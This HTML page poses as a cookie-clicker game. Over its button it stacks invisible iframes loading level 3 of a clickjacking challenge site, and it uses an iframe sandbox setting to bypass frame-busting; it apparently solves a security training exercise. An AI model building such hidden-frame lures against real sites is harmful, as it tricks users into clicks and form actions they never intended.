<html>
<head>
	<title></title>
	<style type="text/css">

		html, body 
		{
			color: #333333;
font-family: Century Gothic, sans-serif;
		}
		.parent {
			position: relative;
			width: 200px;
			height: 50px;
			margin: 20px auto 20px;
			overflow: hidden;
		}

		.parent:hover {
			cursor: pointer;
		}

		.frame {
			position: absolute;
			    opacity: 0;
			    border: none;outline:none;
			   height: 163px;
  width: 292px;
		}

		.frame:hover {
			cursor: pointer;
		}

		.top-row {
  top: -148px;
}
.mid-row {
  top: -133px;
}
.bot-row {
  top: -118px;
}
		.col-one {
			left: -229px;
		}
		.col-two {
			left:-162px;
		}
		.col-three {
			left: -100px;
		}

		@-webkit-keyframes rotating /* Safari and Chrome */ {
  from {
    -ms-transform: rotate(0deg);
    -moz-transform: rotate(0deg);
    -webkit-transform: rotate(0deg);
    -o-transform: rotate(0deg);
    transform: rotate(0deg);
  }
  to {
    -ms-transform: rotate(360deg);
    -moz-transform: rotate(360deg);
    -webkit-transform: rotate(360deg);
    -o-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
@keyframes rotating {
  from {
    -ms-transform: rotate(0deg);
    -moz-transform: rotate(0deg);
    -webkit-transform: rotate(0deg);
    -o-transform: rotate(0deg);
    transform: rotate(0deg);
  }
  to {
    -ms-transform: rotate(360deg);
    -moz-transform: rotate(360deg);
    -webkit-transform: rotate(360deg);
    -o-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
.rotating {
  -webkit-animation: rotating 2s linear infinite;
  -moz-animation: rotating 2s linear infinite;
  -ms-animation: rotating 2s linear infinite;
  -o-animation: rotating 2s linear infinite;
  animation: rotating 2s linear infinite;
}

.main-div {
	width: 100%;
	text-align: center;
}

.cookie {
	margin-left: auto;
	margin-right: auto;
}

#counter {
	color: blue;
	font-size: 4em;
}

.btn {
  background: #3498db;
  background-image: -webkit-linear-gradient(top, #3498db, #2980b9);
  background-image: -moz-linear-gradient(top, #3498db, #2980b9);
  background-image: -ms-linear-gradient(top, #3498db, #2980b9);
  background-image: -o-linear-gradient(top, #3498db, #2980b9);
  background-image: linear-gradient(to bottom, #3498db, #2980b9);
  -webkit-border-radius: 28;
  -moz-border-radius: 28;
  border-radius: 28px;
  font-family: Arial;
  color: #ffffff;
  font-size: 14px;
  padding: 5px 20px 5px 20px;
  text-decoration: none;
  display: block;
  height: 30px;
  
}

.btn:hover {
  background: #3cb0fd;
  background-image: -webkit-linear-gradient(top, #3cb0fd, #3498db);
  background-image: -moz-linear-gradient(top, #3cb0fd, #3498db);
  background-image: -ms-linear-gradient(top, #3cb0fd, #3498db);
  background-image: -o-linear-gradient(top, #3cb0fd, #3498db);
  background-image: linear-gradient(to bottom, #3cb0fd, #3498db);
  text-decoration: none;
  cursor: pointer;
}
	</style>
</head>
<body>
	<script type="text/javascript">
		
	</script>
	<div class="main-div">
		<h1>COOKIE CLICKER ULTIMATE!</h1>
		<h3>Click the button and try to get the highest score.</h3>
		<h1 id="counter">0</h1>
		<img class="rotating cookie" width="200" height="200" src="https://www.hamptoncreek.com/img/p-just-cookies/panel-cookie-choc-cookie.png">
		
		<div class="parent">
			<button class="btn">CLICK THE COOKIE!</button>

			<iframe scrolling="no" onclick="upNum()" sandbox="allow-forms" style="z-index:998"class="frame top-row col-one" src="http://clickjacking-challenges.r7.io/level/3?name=meghv"></iframe>
			<iframe scrolling="no" onclick="upNum()" sandbox="allow-forms" style="z-index:997"class="frame mid-row col-one" src="http://clickjacking-challenges.r7.io/level/3?name=meghv"></iframe>

			<iframe scrolling="no" onclick="upNum()" sandbox="allow-forms" style="z-index:996"class="frame top-row col-two" src="http://clickjacking-challenges.r7.io/level/3?name=meghv"></iframe>
			<iframe scrolling="no" sandbox="allow-forms" style="z-index:995"class="frame mid-row col-two" src="http://clickjacking-challenges.r7.io/level/3?name=meghv"></iframe>

			<iframe scrolling="no" onclick="upNum()" sandbox="allow-forms" style="z-index:994"class="frame top-row col-three" src="http://clickjacking-challenges.r7.io/level/3?name=meghv"></iframe>
			<iframe scrolling="no" onclick="upNum()" sandbox="allow-forms" style="z-index:993"class="frame mid-row col-three" src="http://clickjacking-challenges.r7.io/level/3?name=meghv"></iframe>

		</div>
	</div>
	<script type="text/javascript">
		counter = 0;
		var cEl = document.getElementById("counter");
		document.getElementsByClassName("parent")[0].addEventListener("click", upNum());
		function upNum() {
			counter++;
			cEl.innerText = counter;
		}

	</script>
	
</body>
</html>

<!-- 
References 
=============================
http://www.w3schools.com/tags/att_iframe_sandbox.asp
https://en.wikipedia.org/wiki/Framekiller#Anti-Framekiller
-->

